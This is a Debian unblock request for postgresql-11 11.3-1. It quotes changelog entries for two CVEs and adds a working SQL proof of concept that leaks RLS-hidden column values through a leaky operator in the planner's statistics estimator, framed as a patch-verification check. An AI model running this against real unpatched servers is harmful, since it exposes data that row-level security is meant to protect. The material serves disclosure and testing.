Package: release.debian.org
Severity: normal
User: release.debian....@packages.debian.org
Usertags: unblock

Please unblock package postgresql-11.

The new version fixes two security bugs, and various other issues. (This is a new upstream minor release, which would have been pushed by the security team if buster were already released.)

unblock postgresql-11/11.3-1

Christoph

postgresql-11 (11.3-1) unstable; urgency=medium

  * New upstream version.
    + Prevent row-level security policies from being bypassed via selectivity
      estimators (Dean Rasheed)

      Some of the planner's selectivity estimators apply user-defined
      operators to values found in pg_statistic (e.g., most-common values).
      A leaky operator therefore can disclose some of the entries in a data
      column, even if the calling user lacks permission to read that column.
      In CVE-2017-7484 we added restrictions to forestall that, but we failed
      to consider the effects of row-level security. A user who has SQL
      permission to read a column, but who is forbidden to see certain rows
      due to RLS policy, might still learn something about those rows'
      contents via a leaky operator. This patch further tightens the rules,
      allowing leaky operators to be applied to statistics data only when
      there is no relevant RLS policy. (CVE-2019-10130)

    + Avoid access to already-freed memory during partition routing error
      reports (Michael Paquier)

      This mistake could lead to a crash, and in principle it might be
      possible to use it to disclose server memory contents.
      (CVE-2019-10129)

 -- Christoph Berg <m...@debian.org>  Tue, 07 May 2019 12:04:34 +0200
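The following script is an added illustration of the leaky-operator mechanism the first changelog entry describes; it is not part of the unblock request, the Debian package, or upstream's regression tests. The table, role, policy, function and operator names (secrets, alice, own_rows, leaky_eq, ===) are made up for the example, and the data is constructed inline. It is meant to be run against an 11.x server by a superuser, which can SET ROLE to the test user.

```sql
-- Added demonstration of CVE-2019-10130 (constructed example, not from the report).
-- All object names below are assumptions chosen for this illustration.

CREATE ROLE alice;

CREATE TABLE secrets (owner text, token text);
-- Insert every token three times so ANALYZE records it as a most-common
-- value (MCV) in pg_statistic; the planner only consults statistics that exist.
INSERT INTO secrets
  SELECT 'bob', 'bob-secret-' || i FROM generate_series(1, 5) i, generate_series(1, 3);
INSERT INTO secrets
  SELECT 'alice', 'alice-token-' || i FROM generate_series(1, 5) i, generate_series(1, 3);
ANALYZE secrets;

-- alice has SQL permission to read every column, but RLS hides bob's rows from her.
GRANT SELECT ON secrets TO alice;
ALTER TABLE secrets ENABLE ROW LEVEL SECURITY;
CREATE POLICY own_rows ON secrets FOR SELECT USING (owner = current_user);

-- A "leaky" operator: its function is not marked LEAKPROOF and it echoes its
-- left input. RESTRICT = eqsel tells the planner to estimate selectivity by
-- applying this operator to each MCV of the column, i.e. to stats data.
CREATE FUNCTION leaky_eq(text, text) RETURNS boolean
LANGUAGE plpgsql AS $$
BEGIN
  RAISE NOTICE 'leaky_eq saw: %', $1;
  RETURN $1 = $2;
END $$;
CREATE OPERATOR === (LEFTARG = text, RIGHTARG = text,
                     PROCEDURE = leaky_eq, RESTRICT = eqsel);

SET ROLE alice;
-- EXPLAIN only plans the query, so no row is ever scanned: any NOTICE you see
-- comes from the selectivity estimator feeding pg_statistic values to ===.
-- Before 11.3 the NOTICEs list bob's tokens, which the RLS policy should hide.
-- With the fix, statistics are not handed to a leaky operator while an RLS
-- policy applies to the table, and the planner falls back to a default estimate.
EXPLAIN SELECT * FROM secrets WHERE token === 'no-such-token';
RESET ROLE;
```

The practitioner's check is the EXPLAIN line: on a patched server it must produce no NOTICE mentioning a bob-secret value. Marking leaky_eq LEAKPROOF (which only a superuser can do) is the sanctioned way to let an operator participate in statistics-based estimation on RLS-protected tables, since the planner trusts that label; any operator without it should be assumed able to disclose its inputs through errors or messages exactly as shown here.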